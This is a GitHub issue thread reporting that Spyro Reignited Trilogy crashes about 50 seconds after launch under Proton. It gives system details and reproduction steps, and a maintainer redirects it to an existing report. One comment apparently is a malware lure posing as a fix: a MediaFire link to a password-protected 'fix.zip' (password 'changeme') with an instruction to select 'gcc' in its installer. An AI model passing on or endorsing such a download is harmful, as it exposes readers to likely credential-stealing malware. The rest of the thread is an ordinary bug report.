### ISSUE TITLE
Spyro Reignited Trilogy crashes after 50 seconds

### ISSUE THREAD

**Issue by w-canvas** [ValveSoftware/Proton#8030]
# Compatibility Report
- Name of the game with compatibility issues: Spyro Reignited Trilogy
- Steam AppID of the game: 996580

## System Information
- GPU: RTX 4090
- Video driver version: nvidia v: 560.35.03
- Kernel version: 6.8.0-41-generic
- Link to full system information report as [Gist](https://gist.github.com/):
- Proton version: 17.0

## I confirm:
- [ ] that I haven't found an existing compatibility report for this game.
- [x] that I have checked whether there are updates for my system available.

## Symptoms 

Game crashes 50 seconds after launching (not counting the menu).

Happens with all (3) titles.

## Reproduction

1. Launch the game
2. Select continue
3. Select any title
4. wait 50 seconds

[steam-996580.log](https://github.com/user-attachments/files/16781428/steam-996580.log)

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kisak-valve** [comment]
Hello @w-canvas, we're using one issue report per unofficially supported game title, so I've gone ahead and transferred this issue report to https://github.com/ValveSoftware/Proton/issues/3035#issuecomment-2315184648.
